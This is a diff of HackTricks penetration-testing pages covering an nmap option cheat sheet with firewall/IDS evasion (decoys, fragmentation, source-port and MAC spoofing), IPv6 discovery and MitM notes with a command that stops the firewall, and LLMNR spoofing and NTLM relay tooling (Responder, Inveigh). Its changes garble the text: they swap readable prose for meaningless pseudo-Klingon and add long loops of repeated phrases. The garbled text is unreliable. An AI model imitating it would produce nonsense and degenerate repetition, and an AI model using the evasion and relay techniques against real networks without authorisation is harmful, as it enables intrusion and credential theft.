**nmap --script-help="not intrusive" -> Todos menos esos**
|
||||
**nmap --script-help="not intrusive" -> vItlhutlh**
|
||||
|
||||
**nmap --script-help="default or safe" -> Los que estan en uno o en otro o en ambos**
|
||||
**nmap --script-help="default or safe" -> vItlhutlh**
|
||||
|
||||
**nmap --script-help="default and safe" --> Los que estan en ambos**
|
||||
**nmap --script-help="default and safe" --> vItlhutlh**
|
||||
|
||||
**nmap --script-help="(default or safe or intrusive) and not http-\*"**
|
||||
|
||||
|
@ -108,117 +105,86 @@ Para buscar scripts:
|
|||
|
||||
\--script-help _\<filename>_|_\<category>_|_\<directory>_|_\<expression>_|all\[,...]
|
||||
|
||||
\--script-trace ---> Da info de como va elscript
|
||||
\--script-trace ---> scriptmeyDaq DaH vItlhutlh
|
||||
|
||||
\--script-updatedb
|
||||
|
||||
**Para usar un script solo hay que poner: namp --script Nombre\_del\_script objetivo** --> Al poner el script se ejecutará tanto el script como el escaner, asi que tambien se pueden poner opciones del escaner, podemos añadir **“safe=1”** para que se ejecuten solo los que sean seguros.
|
||||
Script vItlhutlh nmap --script target DaH namp --script Name_of_script --> script 'ej 'ej nmap scanner, vaj 'ej scanner options, 'ej **"safe=1"** vItlhutlh'e' vItlhutlh'e'
|
||||
|
||||
**Control tiempo**
|
||||
**time control**
|
||||
|
||||
**Nmap puede modificar el tiempo en segundos, minutos, ms:** --host-timeout arguments 900000ms, 900, 900s, and 15m all do the same thing.
|
||||
Nmap vItlhutlh time seconds, minutes, ms modify: --host-timeout arguments 900000ms, 900, 900s, 'ej 15m vItlhutlh
|
||||
|
||||
Nmap divide el numero total de host a escanear en grupos y analiza esos grupos en bloques de forma que hasta que no han sido analizados todos, no pasa al siguiente bloque (y el usuario tampoco recibe ninguna actualización hasta que se haya analizado el bloque) de esta forma, es más óptimo para nmap usar grupos grandes. Por defecto en clase C usa 256.
|
||||
Nmap target vItlhutlh groups vItlhutlh analyze, 'ej vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, vaj vItlhutlh analyze blocks, v
|
||||
**--proxies** _**\<Comma-separated list of proxy URLs>**_ **--proxies** _**\<Comma-separated list of proxy URLs>**_
|
||||
|
||||
Se puede cambiar con\*\*--min-hostgroup\*\* _**\<numhosts>**_**;** **--max-hostgroup** _**\<numhosts>**_ (Adjust parallel scan group sizes)
|
||||
Para usar proxies, a veces un proxy no mantiene tantas conexiones abiertas como nmap quiere por lo que habria que modificar el paralelismo: --max-parallelism
|
||||
|
||||
Se puede controlar el numero de escaners en paralelo pero es mejor que no (nmpa ya incorpora control automatico en base al estado de la red): **--min-parallelism** _**\<numprobes>**_**;** **--max-parallelism** _**\<numprobes>**_
|
||||
**-sP** **-sP**
|
||||
|
||||
Podemos modificar el rtt timeout, pero no suele ser necesario: **--min-rtt-timeout** _**\<time>**_**,** **--max-rtt-timeout** _**\<time>**_**,** **--initial-rtt-timeout** _**\<time>**_
|
||||
|
||||
Podemos modificar el numero de intentos:**--max-retries** _**\<numtries>**_
|
||||
|
||||
Podemos modificar el tiempo de escaneado de un host: **--host-timeout** _**\<time>**_
|
||||
|
||||
Podemos modificar el tiempo entre cada prueba para que vaya despacio: **--scan-delay** _**\<time>**_**;** **--max-scan-delay** _**\<time>**_
|
||||
|
||||
Podemos modificar el numero de paquetes por segundo: **--min-rate** _**\<number>**_**;** **--max-rate** _**\<number>**_
|
||||
|
||||
Muchos puertos tardan mucho en responder al estar filtrados o cerrados, si solo nos interesan los abiertos, podemos ir más rápido con: **--defeat-rst-ratelimit**
|
||||
|
||||
Para definir lo agresivo que queremos que sea nmap: -T paranoid|sneaky|polite|normal|aggressive|insane
|
||||
|
||||
\-T (0-1)
|
||||
|
||||
\-T0 --> Solo se escanea 1 puerto a la vez y se espera 5min hasta el siguiente
|
||||
|
||||
\-T1 y T2 --> Muy parecidos pero solo esperan 15 y 0,4seg respectivamente enttre cada prueba
|
||||
|
||||
\-T3 --> Funcionamiento por defecto, incluye en paralelo
|
||||
|
||||
\-T4 --> --max-rtt-timeout 1250ms --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --max-retries 6 --max-scan-delay 10ms
|
||||
|
||||
\-T5 --> --max-rtt-timeout 300ms --min-rtt-timeout 50ms --initial-rtt-timeout 250ms --max-retries 2 --host-timeout 15m --max-scan-delay 5ms
|
||||
|
||||
**Firewall/IDS**
|
||||
|
||||
No dejan pasar a puertos y analizan paquetes.
|
||||
|
||||
**-f** Para fragmentar paquetes, por defecto los fragmenta en 8bytes después de la cabecera, para especificar ese tamaño usamos ..mtu (con esto, no usar -f), el offset debe ser multiplo de 8. **Escaners de version y scripts no soportan la fragmentacion**
|
||||
|
||||
**-D decoy1,decoy2,ME** Nmap envia escaneres pero con otras direcciones IPs como origen, de esta forma te esconden a ti. Si pones el ME en la lista, nmap te situara ahi, mejor poner 5 o 6 antes de ti para que te enmascaren completamente. Se pueden generar iPs aleatorias con RND:\<numero> Para generar \<numero> de Ips aleatorias. No funcionan con detector de versiones sin conexion de TCP. Si estas dentro de una red, te interesa usar Ips que esten activas, pues sino será muy facil averiguar que tu eres la unica activa.
|
||||
|
||||
Para usar Ips aleatorias: nmap-D RND: 10 Ip\_objetivo
|
||||
|
||||
**-S IP** Para cuando Nmap no pilla tu dirección Ip se la tienes que dar con eso. También sirve para hacer pensar que hay otro objetivo escaneandoles.
|
||||
|
||||
**-e \<interface>** Para elegir la interfaz
|
||||
|
||||
Muchos administradores dejan puertos de entrada abiertos para que todo funcione correctamente y les es más fácil que buscar otra solución. Estos pueden ser los puertos DNS o los de FTP... para busca esta vulnerabilidad nmap incorpora: **--source-port** _**\<portnumber>**_**;-g** _**\<portnumber>**_ _Son equivalentes_
|
||||
|
||||
**--data** _**\<hex string>**_ Para enviar texto hexadecimal: --data 0xdeadbeef and --data \xCA\xFE\x09
|
||||
|
||||
**--data-string** _**\<string>**_ Para enviar un texto normal: --data-string "Scan conducted by Security Ops, extension 7192"
|
||||
|
||||
**--data-length** _**\<number>**_ Nmap envía solo cabeceras, con esto logramos que añada a estar un numero de bytes mas (que se generaran aleatoriamente)
|
||||
|
||||
Para configurar el paquete IP completamente usar **--ip-options**
|
||||
|
||||
If you wish to see the options in packets sent and received, specify --packet-trace. For more information and examples of using IP options with Nmap, see [http://seclists.org/nmap-dev/2006/q3/52](http://seclists.org/nmap-dev/2006/q3/52).
|
||||
|
||||
**--ttl** _**\<value>**_
|
||||
|
||||
**--randomize-hosts** Para que el ataque sea menos obvio
|
||||
|
||||
**--spoof-mac** _**\<MAC address, prefix, or vendor name>**_ Para cambiar la mac ejemplos: Apple, 0, 01:02:03:04:05:06, deadbeefcafe, 0020F2, and Cisco
|
||||
|
||||
**--proxies** _**\<Comma-separated list of proxy URLs>**_ Para usar proxies, a veces un proxy no mantiene tantas conexiones abiertas como nmap quiere por lo que habria que modificar el paralelismo: --max-parallelism
|
||||
|
||||
**-sP** Para descubrir host en la red en la que estamos por ARP
|
||||
Para descubrir host en la red en la que estamos por ARP
|
||||
|
||||
Muchos administradores crean una regla en el firewall que permite pasar todos los paquetes que provienen de un puerto en particular (como el 20,53 y 67), podemos decire a nmap que mande nuestros paquetes desde esos puertos: **nmap --source-port 53 Ip**
|
||||
|
||||
**Salidas**
|
||||
|
||||
**-oN file** Salida normal
|
||||
**-oN file** **-oN file**
|
||||
|
||||
**-oX file** Salida XML
|
||||
Salida normal
|
||||
|
||||
**-oS file** Salida de script kidies
|
||||
**-oX file** **-oX file**
|
||||
|
||||
**-oG file** Salida grepable
|
||||
Salida XML
|
||||
|
||||
**-oA file** Todos menos -oS
|
||||
**-oS file** **-oS file**
|
||||
|
||||
**-v level** verbosity
|
||||
Salida de script kidies
|
||||
|
||||
**-d level** debugin
|
||||
**-oG file** **-oG file**
|
||||
|
||||
**--reason** Porqué del host y estado
|
||||
Salida grepable
|
||||
|
||||
**--stats-every time** Cada ese tiempo nos dice como va
|
||||
**-oA file** **-oA file**
|
||||
|
||||
**--packet-trace** Para ver que paquetes salen se pueden especificar filtros como: --version-trace o --script-trace
|
||||
Todos menos -oS
|
||||
|
||||
**--open** muestra los abiertos, abiertos|filtrados y los no filtrados
|
||||
**-v level** **-v level**
|
||||
|
||||
**--resume file** Saca un resumen
|
||||
verbosity
|
||||
|
||||
**-d level** **-d level**
|
||||
|
||||
debugin
|
||||
|
||||
**--reason** **--reason**
|
||||
|
||||
Porqué del host y estado
|
||||
|
||||
**--stats-every time** **--stats-every time**
|
||||
|
||||
Cada ese tiempo nos dice como va
|
||||
|
||||
**--packet-trace** **--packet-trace**
|
||||
|
||||
Para ver que paquetes salen se pueden especificar filtros como: --version-trace o --script-trace
|
||||
|
||||
**--open** **--open**
|
||||
|
||||
muestra los abiertos, abiertos|filtrados y los no filtrados
|
||||
|
||||
**--resume file** **--resume file**
|
||||
|
||||
Saca un resumen
|
||||
|
||||
**Miscelanea**
|
||||
|
||||
**-6** Permite ipv6
|
||||
**-6** **-6**
|
||||
|
||||
**-A** es lo mismo que -O -sV -sC --traceroute
|
||||
Permite ipv6
|
||||
|
||||
**-A** **-A**
|
||||
|
||||
es lo mismo que -O -sV -sC --traceroute
|
||||
|
||||
**Run time**
|
||||
|
||||
|
|
|
@ -1,16 +1,14 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!</strong></a> <strong>qaStaHvIS</strong> <strong>AWS hacking</strong> <strong>ghItlhvam</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
<strong>HackTricks</strong> <strong>poH</strong> <strong>support</strong> <strong>ways</strong>:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* <strong>HackTricks</strong> <strong>advertised</strong> <strong>company</strong> <strong>company</strong> <strong>**SUBSCRIPTION PLANS**</strong> <strong>Check</strong> <strong>or</strong> <strong>**download HackTricks in PDF**</strong> <strong>Want</strong> <strong>**HackTricks**</strong> <strong>in</strong> <strong>PDF</strong> <strong>download</strong> <strong>or</strong> <strong>**company advertised in HackTricks**</strong> <strong>see</strong> <strong>**Check the**</strong> [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* <strong>PEASS & HackTricks swag</strong> <strong>official</strong> <strong>Get</strong> <strong>**official PEASS & HackTricks swag**</strong> (https://peass.creator-spring.com)
|
||||
* <strong>PEASS Family</strong> <strong>The</strong> <strong>Discover</strong> <strong>**The PEASS Family**</strong> (https://opensea.io/collection/the-peass-family) <strong>exclusive NFTs</strong> <strong>collection</strong> <strong>**our collection of exclusive NFTs**</strong> (https://opensea.io/collection/the-peass-family)
|
||||
* <strong>group</strong> <strong>Discord</strong> <strong>the</strong> 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) <strong>group</strong> <strong>or</strong> <strong>group</strong> <strong>telegram</strong> <strong>the</strong> [**telegram group**](https://t.me/peass) <strong>us</strong> <strong>**Join the**</strong> 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* <strong>tricks</strong> <strong>hacking</strong> <strong>your</strong> <strong>Share</strong> <strong>**Share your hacking tricks by submitting PRs to the**</strong> [**HackTricks**](https://github.com/carlospolop/hacktricks) <strong>and</strong> [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) <strong>repos</strong> <strong>github</strong> <strong>the</strong> <strong>to</strong> <strong>by</strong> <strong>PRs</strong> <strong>submitting</strong>
|
||||
|
||||
</details>
|
||||
|
||||
|
@ -41,7 +39,6 @@ To interact with IPv6 networks, you can use various commands:
|
|||
- **alive6**: An alternative tool for discovering devices on the same network.
|
||||
|
||||
Below are some command examples:
|
||||
|
||||
```bash
|
||||
ping6 –I eth0 -c 5 ff02::1 > /dev/null 2>&1
|
||||
ip neigh | grep ^fe80
|
||||
|
@ -49,9 +46,6 @@ ip neigh | grep ^fe80
|
|||
# Alternatively, use alive6 for neighbor discovery
|
||||
alive6 eth0
|
||||
```
|
||||
|
||||
IPv6 addresses can be derived from a device's MAC address for local communication. Here's a simplified guide on how to derive the Link-local IPv6 address from a known MAC address, and a brief overview of IPv6 address types and methods to discover IPv6 addresses within a network.
|
||||
|
||||
## **Deriving Link-local IPv6 from MAC Address**
|
||||
|
||||
Given a MAC address **`12:34:56:78:9a:bc`**, you can construct the Link-local IPv6 address as follows:
|
||||
|
@ -81,13 +75,11 @@ Given a MAC address **`12:34:56:78:9a:bc`**, you can construct the Link-local IP
|
|||
|
||||
### Way 2: Using Multicast
|
||||
1. Send a ping to the multicast address `ff02::1` to discover IPv6 addresses on the local network.
|
||||
|
||||
```bash
|
||||
service ufw stop # Stop the firewall
|
||||
ping6 -I <IFACE> ff02::1 # Send a ping to multicast address
|
||||
ip -6 neigh # Display the neighbor table
|
||||
```
|
||||
|
||||
## IPv6 Man-in-the-Middle (MitM) Attacks
|
||||
Several techniques exist for executing MitM attacks in IPv6 networks, such as:
|
||||
|
||||
|
@ -97,24 +89,21 @@ Several techniques exist for executing MitM attacks in IPv6 networks, such as:
|
|||
- Setting up a rogue DHCPv6 server.
|
||||
|
||||
|
||||
# Identifying IPv6 Addresses in the eild
|
||||
# Identifying IPv6 Addresses in the Wild
|
||||
|
||||
## Exploring Subdomains
|
||||
A method to find subdomains that are potentially linked to IPv6 addresses involves leveraging search engines. For instance, employing a query pattern like `ipv6.*` can be effective. Specifically, the following search command can be used in Google:
|
||||
|
||||
```bash
|
||||
site:ipv6./
|
||||
```
|
||||
## DNS tlhIngan Holmey
|
||||
IPv6 patlh DNS record types cha'logh cha'logh:
|
||||
- **AXFR**: cha'logh DNS records cha'logh, DNS records cha'logh cha'logh.
|
||||
- **AAAA**: IPv6 patlh cha'logh.
|
||||
- **ANY**: DNS records cha'logh cha'logh.
|
||||
|
||||
## Utilizing DNS Queries
|
||||
To identify IPv6 addresses, certain DNS record types can be queried:
|
||||
- **AXFR**: Requests a complete zone transfer, potentially uncovering a wide range of DNS records.
|
||||
- **AAAA**: Directly seeks out IPv6 addresses.
|
||||
- **ANY**: A broad query that returns all available DNS records.
|
||||
|
||||
## Probing with Ping6
|
||||
After pinpointing IPv6 addresses associated with an organization, the `ping6` utility can be used for probing. This tool helps in assessing the responsiveness of identified IPv6 addresses, and might also assist in discovering adjacent IPv6 devices.
|
||||
|
||||
## Ping6 jatlh
|
||||
ghaH IPv6 patlh cha'logh cha'logh, `ping6` utility jatlh probing. vaj cha'logh IPv6 patlh cha'logh, responsiveness assessing vaj adjacent IPv6 devices discovering vaj jatlh.
|
||||
|
||||
## References
|
||||
|
||||
|
@ -135,5 +124,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -18,10 +18,10 @@ Other ways to support HackTricks:
|
|||
|
||||
### Local Host Resolution Protocols
|
||||
- **LLMNR, NBT-NS, and mDNS**:
|
||||
- Microsoft and other operating systems use LLMNR and NBT-NS for local name resolution when DNS fails. Similarly, Apple and Linux systems use mDNS.
|
||||
- These protocols are susceptible to interception and spoofing due to their unauthenticated, broadcast nature over UDP.
|
||||
- [Responder](https://github.com/lgandx/Responder) can be used to impersonate services by sending forged responses to hosts querying these protocols.
|
||||
- Further information on service impersonation using Responder can be found [here](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
|
||||
- Microsoft and other operating systems use LLMNR and NBT-NS for local name resolution when DNS fails. Similarly, Apple and Linux systems use mDNS.
|
||||
- These protocols are susceptible to interception and spoofing due to their unauthenticated, broadcast nature over UDP.
|
||||
- [Responder](https://github.com/lgandx/Responder) can be used to impersonate services by sending forged responses to hosts querying these protocols.
|
||||
- Further information on service impersonation using Responder can be found [here](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
|
||||
|
||||
### Web Proxy Auto-Discovery Protocol (WPAD)
|
||||
- WPAD allows browsers to discover proxy settings automatically.
|
||||
|
@ -59,27 +59,557 @@ It's crucial to note that employing these techniques should be done legally and
|
|||
Inveigh is a tool for penetration testers and red teamers, designed for Windows systems. It offers functionalities similar to Responder, performing spoofing and man-in-the-middle attacks. The tool has evolved from a PowerShell script to a C# binary, with [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) and [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) as the main versions. Detailed parameters and instructions can be found in the [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters).
|
||||
|
||||
Inveigh can be operated through PowerShell:
|
||||
|
||||
```powershell
|
||||
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
|
||||
```
|
||||
|
||||
Or executed as a C# binary:
|
||||
|
||||
```
|
||||
'ejDI'eghDI' 'e' vItlhutlh C# binary:
|
||||
```
|
||||
```bash
|
||||
Inveigh.exe
|
||||
```
|
||||
|
||||
### NTLM Relay Attack
|
||||
|
||||
This attack leverages SMB authentication sessions to access a target machine, granting a system shell if successful. Key prerequisites include:
|
||||
- The authenticating user must have Local Admin access on the relayed host.
|
||||
- SMB signing should be disabled.
|
||||
|
||||
#### 445 Port Forwarding and Tunneling
|
||||
|
||||
In scenarios where direct network introduction isn't feasible, traffic on port 445 needs to be forwarded and tunneled. Tools like [**PortBender**](https://github.com/praetorian-inc/PortBender) help in redirecting port 445 traffic to another port, which is essential when local admin access is available for driver loading.
|
||||
|
||||
PortBender setup and operation in Cobalt Strike:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
